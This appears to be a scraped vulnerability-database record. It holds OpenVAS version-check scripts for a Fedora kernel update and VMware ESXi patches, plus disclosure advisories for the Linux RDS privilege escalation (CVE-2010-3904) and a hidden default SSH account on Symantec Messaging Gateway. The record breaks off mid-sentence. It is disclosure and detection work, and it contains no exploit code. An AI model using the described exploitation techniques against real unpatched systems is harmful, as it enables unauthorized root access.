"CVE-2011-1013", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-3081", "CVE-2011-1093", "CVE-2010-3067", "CVE-2010-3084", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2011-1745", "CVE-2011-1182", "CVE-2010-3079", "CVE-2010-3301"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863292", "href": "http://plugins.openvas.org/nasl.php?oid=863292", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-6447\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 13\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061668.html\");\n script_id(863292);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-24 16:46:35 +0200 (Fri, 24 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-6447\");\n script_cve_id(\"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1093\", \"CVE-2011-1079\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4165\", \"CVE-2011-0521\", \"CVE-2010-4346\", \"CVE-2010-4649\", \"CVE-2011-0006\", \"CVE-2010-4648\", \"CVE-2010-4650\", \"CVE-2010-4163\", \"CVE-2010-4668\", \"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-3874\", \"CVE-2010-4162\", \"CVE-2010-4249\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3698\", \"CVE-2010-3705\", \"CVE-2010-3442\", \"CVE-2010-4258\", \"CVE-2010-4169\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-4082\", \"CVE-2010-3904\", \"CVE-2010-3432\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3081\", \"CVE-2010-3301\", \"CVE-2010-3067\", \"CVE-2010-2960\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2524\", \"CVE-2010-2478\", \"CVE-2010-2071\", \"CVE-2011-1182\", \"CVE-2011-2022\", \"CVE-2010-3084\", \"CVE-2011-1013\", \"CVE-2010-4527\");\n script_name(\"Fedora Update for kernel FEDORA-2011-6447\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.34.9~69.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:46", "description": "The remote ESXi is missing one or more security related Updates from VMSA-2011-0012.3.\n\nSummary\n\nVMware ESXi and ESX updates to third party libraries and ESX Service Console address several security issues.\n\nRelevant releases\n\nESXi 5.0 without patch ESXi500-201112401-SG.\nESXi 4.1 without patch ESXi410-201110201-SG.\nESX 4.1 without patches ESX410-201110201-SG and ESX410-201110224-SG.\nESXi 4.0 without patch ESXi400-201110401-SG.\nESX 4.0 without patches ESX400-201110401-SG, ESX400-201110403-SG and ESX400-201110409-SG.\nESXi 3.5 without patch ESXe350-201203401-I-SG.\nESX 3.5 without patch ESX350-201203403-SG.\n\nProblem Description\n\na. ESX third party update for Service Console kernel\n\n This update takes the console OS kernel package to kernel-2.6.18-238.9.1 which resolves multiple security\n issues.\n\nb. ESX third party update for Service Console krb5 RPMs\n\n This patch updates the krb5-libs and krb5-workstation RPMs of the console OS to version 1.6.1-55.el5_6.1,\n which resolves multiple security issues.\n\nc. ESXi and ESX update to third party component glibc\n\n The glibc third-party library is updated to resolve multiple security issues.\n\nd. ESX update to third party drivers mptsas, mpt2sas, and mptspi\n\n The mptsas, mpt2sas, and mptspi drivers are updated which addresses multiple security issues in the mpt2sas\n driver.", "cvss3": {}, "published": "2012-03-16T00:00:00", "type": "openvas", "title": "VMSA-2011-0012.3 VMware ESXi and ESX updates to third party libraries and ESX Service Console", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4242", "CVE-2010-2942", "CVE-2011-0521", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4072", "CVE-2010-4346", "CVE-2011-1658", "CVE-2010-2492", "CVE-2010-4083", "CVE-2010-2943", "CVE-2011-1494", "CVE-2010-0296", "CVE-2011-1478", "CVE-2010-3859", "CVE-2010-3477", "CVE-2010-3086", "CVE-2010-4251", "CVE-2010-4080", "CVE-2010-4343", "CVE-2010-3877", "CVE-2010-4158", "CVE-2010-3876", "CVE-2011-1659", "CVE-2010-3296", "CVE-2010-4526", "CVE-2010-3015", "CVE-2011-0710", "CVE-2011-0281", "CVE-2010-2938", "CVE-2010-4247", "CVE-2010-4263", "CVE-2010-3442", "CVE-2010-4248", "CVE-2011-1495", "CVE-2010-4243", "CVE-2010-3066", "CVE-2011-1071", "CVE-2010-3880", "CVE-2010-1083", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-4161", "CVE-2011-1010", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-3699", "CVE-2010-4238", "CVE-2011-0282", "CVE-2011-1095", "CVE-2010-4255", "CVE-2010-2798", "CVE-2010-3432", "CVE-2011-1090", "CVE-2011-0536", "CVE-2010-1323", "CVE-2010-4075", "CVE-2010-4655"], "modified": "2017-04-17T00:00:00", "id": "OPENVAS:103455", "href": "http://plugins.openvas.org/nasl.php?oid=103455", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2011-0012.nasl 5958 2017-04-17 09:02:19Z teissa $\n#\n# VMSA-2011-0012.3 VMware ESXi and ESX updates to third party libraries and ESX Service Console\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Apply the missing patch(es).\n\nSee Also:\nhttp://www.vmware.com/security/advisories/VMSA-2011-0012.html\";\n\ntag_summary = \"The remote ESXi is missing one or more security related Updates from VMSA-2011-0012.3.\n\nSummary\n\nVMware ESXi and ESX updates to third party libraries and ESX Service Console address several security issues.\n\nRelevant releases\n\nESXi 5.0 without patch ESXi500-201112401-SG.\nESXi 4.1 without patch ESXi410-201110201-SG.\nESX 4.1 without patches ESX410-201110201-SG and ESX410-201110224-SG.\nESXi 4.0 without patch ESXi400-201110401-SG.\nESX 4.0 without patches ESX400-201110401-SG, ESX400-201110403-SG and ESX400-201110409-SG.\nESXi 3.5 without patch ESXe350-201203401-I-SG.\nESX 3.5 without patch ESX350-201203403-SG.\n\nProblem Description\n\na. ESX third party update for Service Console kernel\n\n This update takes the console OS kernel package to kernel-2.6.18-238.9.1 which resolves multiple security\n issues.\n\nb. ESX third party update for Service Console krb5 RPMs\n\n This patch updates the krb5-libs and krb5-workstation RPMs of the console OS to version 1.6.1-55.el5_6.1,\n which resolves multiple security issues.\n\nc. ESXi and ESX update to third party component glibc\n\n The glibc third-party library is updated to resolve multiple security issues.\n\nd. ESX update to third party drivers mptsas, mpt2sas, and mptspi\n\n The mptsas, mpt2sas, and mptspi drivers are updated which addresses multiple security issues in the mpt2sas\n driver.\";\n\n\nif (description)\n{\n script_id(103455);\n script_cve_id(\"CVE-2010-1083\",\"CVE-2010-2492\",\"CVE-2010-2798\",\"CVE-2010-2938\",\"CVE-2010-2942\",\"CVE-2010-2943\",\"CVE-2010-3015\",\"CVE-2010-3066\",\"CVE-2010-3067\",\"CVE-2010-3078\",\"CVE-2010-3086\",\"CVE-2010-3296\",\"CVE-2010-3432\",\"CVE-2010-3442\",\"CVE-2010-3477\",\"CVE-2010-3699\",\"CVE-2010-3858\",\"CVE-2010-3859\",\"CVE-2010-3865\",\"CVE-2010-3876\",\"CVE-2010-3877\",\"CVE-2010-3880\",\"CVE-2010-3904\",\"CVE-2010-4072\",\"CVE-2010-4073\",\"CVE-2010-4075\",\"CVE-2010-4080\",\"CVE-2010-4081\",\"CVE-2010-4083\",\"CVE-2010-4157\",\"CVE-2010-4158\",\"CVE-2010-4161\",\"CVE-2010-4238\",\"CVE-2010-4242\",\"CVE-2010-4243\",\"CVE-2010-4247\",\"CVE-2010-4248\",\"CVE-2010-4249\",\"CVE-2010-4251\",\"CVE-2010-4255\",\"CVE-2010-4263\",\"CVE-2010-4343\",\"CVE-2010-4346\",\"CVE-2010-4526\",\"CVE-2010-4655\",\"CVE-2011-0521\",\"CVE-2011-0710\",\"CVE-2011-1010\",\"CVE-2011-1090\",\"CVE-2011-1478\",\"CVE-2010-1323\",\"CVE-2011-0281\",\"CVE-2011-0282 CVE-2010-0296\",\"CVE-2011-0536\",\"CVE-2011-1071\",\"CVE-2011-1095\",\"CVE-2011-1658\",\"CVE-2011-1659 CVE-2011-1494\",\"CVE-2011-1495\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:N\");\n script_version (\"$Revision: 5958 $\");\n script_name(\"VMSA-2011-0012.3 VMware ESXi and ESX updates to third party libraries and ESX Service Console\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-17 11:02:19 +0200 (Mon, 17 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 12:42:13 +0100 (Fri, 16 Mar 2012)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\",\"VMware/ESX/version\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item('VMware/ESXi/LSC'))exit(0);\nif(! esxVersion = get_kb_item(\"VMware/ESX/version\"))exit(0);\n\npatches = make_array(\"4.1.0\",\"ESXi410-201110201-SG\",\n \"4.0.0\",\"ESXi400-201110401-SG\",\n \"5.0.0\",\"VIB:esx-base:5.0.0-0.3.515841\");\n\nif(!patches[esxVersion])exit(0);\n\nif(_esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n\n security_message(port:0);\n exit(0);\n\n}\n\nexit(99);\n", "cvss": {"score": 7.9, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2020-08-11T14:22:29", "description": "The remote ESXi is missing one or more security related Updates from VMSA-2011-0012.3.", "cvss3": {}, "published": "2012-03-16T00:00:00", "type": "openvas", "title": "VMware ESXi/ESX updates to third party libraries and ESX Service Console (VMSA-2011-0012.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4242", "CVE-2010-2942", "CVE-2011-0521", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4072", "CVE-2010-4346", "CVE-2011-1658", "CVE-2010-2492", "CVE-2010-4083", "CVE-2010-2943", "CVE-2011-1494", "CVE-2010-0296", "CVE-2011-1478", "CVE-2010-3859", "CVE-2010-3477", "CVE-2010-3086", "CVE-2010-4251", "CVE-2010-4080", "CVE-2010-4343", "CVE-2010-3877", "CVE-2010-4158", "CVE-2010-3876", "CVE-2011-1659", "CVE-2010-3296", "CVE-2010-4526", "CVE-2010-3015", "CVE-2011-0710", "CVE-2011-0281", "CVE-2010-2938", "CVE-2010-4247", "CVE-2010-4263", "CVE-2010-3442", "CVE-2010-4248", "CVE-2011-1495", "CVE-2010-4243", "CVE-2010-3066", "CVE-2011-1071", "CVE-2010-3880", "CVE-2010-1083", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-4161", "CVE-2011-1010", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-3699", "CVE-2010-4238", "CVE-2011-0282", "CVE-2011-1095", "CVE-2010-4255", "CVE-2010-2798", "CVE-2010-3432", "CVE-2011-1090", "CVE-2011-0536", "CVE-2010-1323", "CVE-2010-4075", "CVE-2010-4655"], "modified": "2019-12-18T00:00:00", "id": "OPENVAS:1361412562310103455", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103455", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2011-0012.3 VMware ESXi and ESX updates to third party libraries and ESX Service Console\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103455\");\n script_cve_id(\"CVE-2010-1083\", \"CVE-2010-2492\", \"CVE-2010-2798\", \"CVE-2010-2938\", \"CVE-2010-2942\",\n \"CVE-2010-2943\", \"CVE-2010-3015\", \"CVE-2010-3066\", \"CVE-2010-3067\", \"CVE-2010-3078\",\n \"CVE-2010-3086\", \"CVE-2010-3296\", \"CVE-2010-3432\", \"CVE-2010-3442\", \"CVE-2010-3477\",\n \"CVE-2010-3699\", \"CVE-2010-3858\", \"CVE-2010-3859\", \"CVE-2010-3865\", \"CVE-2010-3876\",\n \"CVE-2010-3877\", \"CVE-2010-3880\", \"CVE-2010-3904\", \"CVE-2010-4072\", \"CVE-2010-4073\",\n \"CVE-2010-4075\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4083\", \"CVE-2010-4157\",\n \"CVE-2010-4158\", \"CVE-2010-4161\", \"CVE-2010-4238\", \"CVE-2010-4242\", \"CVE-2010-4243\",\n \"CVE-2010-4247\", \"CVE-2010-4248\", \"CVE-2010-4249\", \"CVE-2010-4251\", \"CVE-2010-4255\",\n \"CVE-2010-4263\", \"CVE-2010-4343\", \"CVE-2010-4346\", \"CVE-2010-4526\", \"CVE-2010-4655\",\n \"CVE-2011-0521\", \"CVE-2011-0710\", \"CVE-2011-1010\", \"CVE-2011-1090\", \"CVE-2011-1478\",\n \"CVE-2010-1323\", \"CVE-2011-0281\", \"CVE-2011-0282\", \"CVE-2010-0296\", \"CVE-2011-0536\",\n \"CVE-2011-1071\", \"CVE-2011-1095\", \"CVE-2011-1658\", \"CVE-2011-1659\", \"CVE-2011-1494\",\n \"CVE-2011-1495\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:N\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESXi/ESX updates to third party libraries and ESX Service Console (VMSA-2011-0012.3)\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 12:42:13 +0100 (Fri, 16 Mar 2012)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2011-0012.html\");\n\n script_tag(name:\"summary\", value:\"The remote ESXi is missing one or more security related Updates from VMSA-2011-0012.3.\");\n\n script_tag(name:\"affected\", value:\"ESXi 5.0 without patch ESXi500-201112401-SG\n\n ESXi 4.1 without patch ESXi410-201110201-SG\n\n ESX 4.1 without patches ESX410-201110201-SG and ESX410-201110224-SG\n\n ESXi 4.0 without patch ESXi400-201110401-SG\n\n ESX 4.0 without patches ESX400-201110401-SG, ESX400-201110403-SG and ESX400-201110409-SG\n\n ESXi 3.5 without patch ESXe350-201203401-I-SG\n\n ESX 3.5 without patch ESX350-201203403-SG\");\n\n script_tag(name:\"insight\", value:\"VMware ESXi and ESX updates to third party libraries and ESX Service Console address several security issues.\n\n a. ESX third party update for Service Console kernel\n\n This update takes the console OS kernel package to kernel-2.6.18-238.9.1 which resolves multiple security issues.\n\n b. ESX third party update for Service Console krb5 RPMs\n\n This patch updates the krb5-libs and krb5-workstation RPMs of the console OS to version 1.6.1-55.el5_6.1, which resolves multiple security issues.\n\n c. ESXi and ESX update to third party component glibc\n\n The glibc third-party library is updated to resolve multiple security issues.\n\n d. ESX update to third party drivers mptsas, mpt2sas, and mptspi\n\n The mptsas, mpt2sas, and mptspi drivers are updated which addresses multiple security issues in the mpt2sas driver.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"4.1.0\", \"ESXi410-201110201-SG\",\n \"4.0.0\", \"ESXi400-201110401-SG\",\n \"5.0.0\", \"VIB:esx-base:5.0.0-0.3.515841\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:37", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n VSR Security Advisory\r\n http://www.vsecurity.com/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nAdvisory Name: Linux RDS Protocol Local Privilege Escalation\r\n Release Date: 2010-10-19\r\n Application: Linux Kernel\r\n Versions: 2.6.30 - 2.6.36-rc8\r\n Severity: High\r\n Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com >\r\nVendor Status: Patch Released [3]\r\nCVE Candidate: CVE-2010-3904\r\n Reference: http://www.vsecurity.com/resources/advisory/20101019-1/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n\r\nProduct Description\r\n- -------------------\r\n- From [1]:\r\n\r\n "Linux is a free Unix-type operating system originally created by Linus\r\n Torvalds with the assistance of developers around the world. Developed under\r\n the GNU General Public License, the source code for Linux is freely available\r\n to everyone."\r\n\r\n- From [2]:\r\n\r\n "Reliable Datagram Sockets (RDS) provide in order, non-duplicating, \r\n highly available, low overhead, reliable delivery of datagrams between \r\n hundreds of thousands of non-connected endpoints."\r\n\r\nVulnerability Overview\r\n- ----------------------\r\nOn October 13th, VSR identified a vulnerability in the RDS protocol, as\r\nimplemented in the Linux kernel. Because kernel functions responsible for\r\ncopying data between kernel and user space failed to verify that a\r\nuser-provided address actually resided in the user segment, a local attacker\r\ncould issue specially crafted socket function calls to write abritrary values\r\ninto kernel memory. By leveraging this capability, it is possible for\r\nunprivileged users to escalate privileges to root.\r\n\r\nVulnerability Details\r\n- ---------------------\r\nOn Linux, recvmsg() style socket calls are performed using iovec structs, which\r\nallow a user to specify a base address and size for a buffer used to receive\r\nsocket data. Each packet family is responsible for defining functions that\r\ncopy socket data, which is received by the kernel, back to user space to allow\r\nuser programs to process and handle received network data.\r\n\r\nWhen performing this copying of data to user space, the RDS protocol failed to\r\nverify that the base address of a user-provided iovec struct pointed to a valid\r\nuserspace address before using the __copy_to_user_inatomic() function to copy\r\nthe data. As a result, by providing a kernel address as an iovec base and\r\nissuing a recvmsg() style socket call, a local user could write arbitrary data\r\ninto kernel memory. This can be leveraged to escalate privileges to root.\r\n\r\nProof-of-Concept Exploit\r\n- ------------------------\r\nVSR has developed a proof-of-concept exploit [4] to both demonstrate the\r\nseverity of this issue as well as allow users and administrators to verify the\r\nexistence of the vulnerability. The exploit leverages the ability to write\r\ninto kernel memory to reset the kernel's security operations structure and gain\r\nroot privileges. The exploit requires that kernel symbol resolution is\r\navailable to unprivileged users, via /proc/kallsyms or similar, as is the case\r\non most stock distributions. It has been tested on both 32-bit and 64-bit x86\r\nplatforms. While this exploit has been reliable during testing, it is not\r\nadvised to run kernel exploits on production systems, as there is a risk of\r\ncausing system instability and crashing the affected machine.\r\n\r\nVersions Affected\r\n- -----------------\r\nThis vulnerability affects unpatched versions of the Linux kernel, starting\r\nfrom 2.6.30, where the RDS protocol was first included. Installations are only\r\nvulnerable if the CONFIG_RDS kernel configuration option is set, and if there\r\nare no restrictions on unprivileged users loading packet family modules, as is\r\nthe case on most stock distributions.\r\n\r\nVendor Response\r\n- ---------------\r\nThe following timeline details Linux's response to the reported issue.\r\n\r\n2010-10-13 Vulnerability reported to Linux security team\r\n2010-10-13 Response, agreement on disclosure date\r\n2010-10-19 Fix publicly committed [3]\r\n2010-10-19 Coordinated disclosure\r\n\r\nRecommendation\r\n- --------------\r\nUsers should either install updates provided by downstream distributions, or\r\napply the committed patch [3] and recompile their kernel.\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information\r\n- ------------------------------------------------------\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe number CVE-2010-3904 to this issue. This is a candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\nAcknowledgements\r\n- ----------------\r\nThanks to Andrew Morton, Linus Torvalds, Andy Grover, and Eugene Teo for their\r\nprompt responses and patch.\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nReferences:\r\n\r\n1. Linux kernel \r\n http://www.linux.org\r\n\r\n2. Reliable Datagram Sockets\r\n http://oss.oracle.com/pipermail/rds-devel/2007-November/000228.html\r\n\r\n3. GIT patch \r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f\r\n\r\n4. RDS protocol privilege escalation exploit\r\n http://www.vsecurity.com/download/tools/linux-rds-exploit.c\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nThis advisory is distributed for educational purposes only with the sincere\r\nhope that it will help promote public safety. This advisory comes with\r\nabsolutely NO WARRANTY; not even the implied warranty of merchantability or\r\nfitness for a particular purpose. Virtual Security Research, LLC nor the author\r\naccepts any liability for any direct, indirect, or consequential loss or damage\r\narising from use of, or reliance on, this information.\r\n\r\nSee the VSR disclosure policy for more information on our responsible\r\ndisclosure practices: http://www.vsecurity.com/company/disclosure\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n Copyright 2010 Virtual Security Research, LLC. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAky93O8ACgkQQ1RSUNR+T+gXiwCgkVifvjPHDD+Xf6JrQJ4NisSW\r\nUKEAn0Rh+XhN3kGUne5sCAGFeGln+qM0\r\n=cKv/\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2010-10-24T00:00:00", "type": "securityvulns", "title": "VSR Advisories: Linux RDS Protocol Local Privilege Escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-24T00:00:00", "id": "SECURITYVULNS:DOC:24978", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24978", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:39", "description": "It's possible to overwite kernel memory regions via recvmsg() for RDS protocol.", "cvss3": {}, "published": "2010-10-24T00:00:00", "type": "securityvulns", "title": "Linux kernel RDS protocol privilege escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-24T00:00:00", "id": "SECURITYVULNS:VULN:11211", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11211", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n=======\r\nSummary\r\n=======\r\nName: Symantec Messaging Gateway - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\nRelease Date: 30 November 2012\r\nReference: NGS00267\r\nDiscoverer: Ben Williams <ben.williams@ngssecure.com>\r\nVendor: Symantec\r\nVendor Reference: \r\nSystems Affected: Symantec Messaging Gateway 9.5.3-3\r\nRisk: High\r\nStatus: Published\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 18 April 2012\r\nReleased: 18 April 2012\r\nApproved: 29 April 2012\r\nReported: 30 April 2012\r\nFixed: 27 August 2012\r\nPublished: 30 November 2012\r\n\r\n===========\r\nDescription\r\n===========\r\nI. VULNERABILITY\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 is the latest version, of their Email Security Appliance\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nThe "admin" SSH account has a restricted shell, and the password is set by the administrator during setup.\r\n\r\nHowever, there is another SSH account "support" which has a default password, which is not changed during installation, and does not seem to be mentioned in the Symantec documentation as far as I can see (Installation Guide, Administration Guide or Command-line Guide). This account has a very easy-to-guess password, but many administrators may not know it exists.\r\n\r\nAdditionally, the Linux Kernel on the appliance has not been updated since late 2007 (almost 5 years) so suffers from multiple privilege escalation issues (as do other old packages on the operating system) so if SSH is accessible to an attacker, it is possible for them to login 